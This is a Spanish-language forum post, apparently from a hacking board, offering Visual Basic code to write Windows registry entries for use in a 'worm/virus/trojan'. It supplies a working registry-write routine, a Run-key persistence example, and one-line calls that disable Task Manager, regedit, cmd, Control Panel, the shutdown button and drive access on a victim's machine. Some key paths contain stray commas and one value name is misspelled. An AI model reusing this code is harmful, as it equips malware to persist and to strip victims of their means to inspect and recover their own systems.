Autor
Querìa compartir algunas entradas del registro que hacen cosas curiosas y haran feliz a nuestro worm/virus/troyano
Antes que nada,el codigo para modificar una entrada en el registro (hay otras formas,pero esta me gusta):
Código:
'MODULO
'Constantes de tipos de datos
Private m_lngRetVal As Long
Private Const REG_SZ As Long = 1
Private Const REG_BINARY As Long = 3
Private Const REG_DWORD As Long = 4
'Constantes para las llaves
Public Const HKEY_CLASSES_ROOT As Long = &H80000000
Public Const HKEY_CURRENT_USER As Long = &H80000001
Public Const HKEY_LOCAL_MACHINE As Long = &H80000002
Public Const HKEY_USERS As Long = &H80000003
'API
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal lngRootKey As Long) As Long
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" _
(ByVal lngRootKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" _
(ByVal lngRootKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, _
ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
'Esta es nuestra funciòn para crear/editar una entrada:
Public Sub RegC(ByVal lngRootKey As Long, ByVal strRegKeyPath As String, _
ByVal strRegSubKey As String, varRegData As Variant)
Dim lngKeyHandle As Long
Dim lngDataType As Long
Dim lngKeyValue As Long
Dim strKeyValue As String
If IsNumeric(varRegData) Then
lngDataType = REG_DWORD
Else
lngDataType = REG_SZ
End If
m_lngRetVal = RegCreateKey(lngRootKey, strRegKeyPath, lngKeyHandle)
Select Case lngDataType
Case REG_SZ:
strKeyValue = Trim(varRegData) & Chr(0) '
m_lngRetVal = RegSetValueEx(lngKeyHandle, strRegSubKey, 0&, lngDataType, _
ByVal strKeyValue, Len(strKeyValue))
Case REG_DWORD:
lngKeyValue = CLng(varRegData)
m_lngRetVal = RegSetValueEx(lngKeyHandle, strRegSubKey, 0&, lngDataType, _
lngKeyValue, 4&)
End Select
m_lngRetVal = RegCloseKey(lngKeyHandle)
End Sub
Un ejemplo para usar la funciòn :
Código:
RegC HKEY_LOCAL_MACHINE,"Software\Microsoft\Windows\CurrentVersion\Run","Hola","c:\Hola.exe"
Se creara/modificara la entrada Hola,con los datos "c:\hola.exe",en la ruta HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Ahora lo bueno:
Para ocultar el acceso al Panel de Control.
Código:
RegC HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Policies\System,","NoDispCPL","1"
Para desaparecer el botòn de Apagar:
Código:
RegC HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,","NoClose","1"
Para dejar en blanco el escritorio(No iconos):
Código:
RegC HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,","NoDesktop","1"
Para restringir drives de Mi PC
Código:
RegC HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,","NoDrives","3"
Para esa funciòn,pueden cambiar el "3" por los sig. valores para resultados diferentes: "3" restringe acceso a las unidades A y B,"4" restringe C: (buenisimo),"7" restringe A,B y C,"F" de A hasta D.
Para desactivar el botòn Buscar:
Código:
RegC HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,","NoFind","1"
Para desactivar Opciones de Carpeta:
Código:
RegC HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,","NoFoldeOptions","1"
Para desactivar el boton Ejecutar:
Código:
RegC HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,","NoRun","1"
Para desactivar que se guarden los cambios al cerrar sesion :
Código:
RegC HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,","NoSaveSettings","1"
Para desactivar la modificaciòn del registro (regedit y regedt32) :
Código:
RegC HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Policies\System,","DisableRegistryTools","1"
Para desactivar el admin. de tareas (taskmgr) :
Código:
RegC HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Policies\System,","DisableTaskManager","1"
Para desactivar la consola (cmd) :
Código:
RegC HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Policies\System,","DisableCMD","1"
Espero que les agrade
En línea
